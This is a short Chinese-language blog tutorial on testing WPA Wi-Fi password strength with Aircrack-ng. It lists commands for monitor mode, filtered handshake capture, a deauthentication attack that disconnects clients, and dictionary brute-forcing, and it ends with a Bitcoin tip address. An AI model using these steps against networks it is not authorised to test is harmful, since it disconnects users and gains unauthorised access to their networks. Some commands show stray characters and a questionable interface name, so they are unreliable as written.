利用 Aircrack-ng 進(jìn)行 WI-FI (WPA)密碼強(qiáng)度測(cè)試.

1.查看你的網(wǎng)卡

ifconfig


2.將你的網(wǎng)卡設(shè)置為監(jiān)聽(tīng)模式

airmon-ng start virbr0



3.查看無(wú)線網(wǎng)絡(luò)

airodump-ng mon0



4.通過(guò)過(guò)濾抓包

airodump-ng ?--ivs ?--bssid ?FC:D7:33:3F:BC:F8 ?–w ?longas ?-c ?11 ?mon0

--bssid 是路由器的mac地址

-w 是寫(xiě)入到文件longas中

-c 11 是頻道11

--ivs 是只抓取可用于破解的IVS數(shù)據(jù)報(bào)文



5. 使用攻擊手段使客戶端的無(wú)線網(wǎng)掉線然后可以抓取整個(gè)認(rèn)證包.

aireplay-ng? -0 10? -a? 路由器MAC -e 客戶端MAC? mon0 --ignore-negative-one

-0 ? 攻擊模式 10次

-a AP MAC

-e 客戶端mac

-ignore-negative-one 內(nèi)核支持



6.暴力破解

破解的真正關(guān)建在于字典的強(qiáng)大.

aircrack-ng? -w pass longas-03.ivs


總結(jié): 通過(guò)認(rèn)證抓包,暴力破解密碼.

如果你覺(jué)得文章對(duì)您有幫助就打賞一下吧。

BTC : 18BqdPe7m5XYF8sWGtP3we71dL5BLXY6PU

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容